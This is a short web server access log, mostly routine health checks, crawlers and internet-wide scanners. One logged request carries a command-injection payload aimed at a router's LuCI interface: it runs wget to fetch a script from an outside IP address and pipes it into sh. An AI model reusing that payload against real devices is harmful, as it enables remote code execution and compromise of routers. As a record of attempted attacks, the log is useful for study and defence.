195.56.55.225 - - [03/Sep/2024:16:22:17 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:16:24:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:16:24:35 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.swartz.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:16:24:36 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:16:26:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
3.101.240.50 - - [03/Sep/2024:16:27:29 +0200] "HEAD / HTTP/1.1" 200 0 "-" "bitdiscovery"
195.56.55.225 - - [03/Sep/2024:16:28:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:16:30:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
173.252.107.17 - - [03/Sep/2024:16:31:04 +0200] "GET /robots.txt HTTP/1.1" 404 285 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
147.185.132.13 - - [03/Sep/2024:16:31:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:16:32:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:16:34:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:16:36:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.224.128.59 - - [03/Sep/2024:16:36:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
95.163.236.150 - - [03/Sep/2024:16:38:01 +0200] "\x16\x03\x01\x01X\x01" 501 - "-" "-"
95.163.236.150 - - [03/Sep/2024:16:38:01 +0200] "\x16\x03\x01\x01X\x01" 501 - "-" "-"
195.56.55.225 - - [03/Sep/2024:16:38:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
52.53.197.83 - - [03/Sep/2024:16:39:07 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
185.191.126.213 - - [03/Sep/2024:16:39:17 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:16:40:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
176.77.142.79 - - [03/Sep/2024:16:42:02 +0200] "-" 408 - "-" "-"
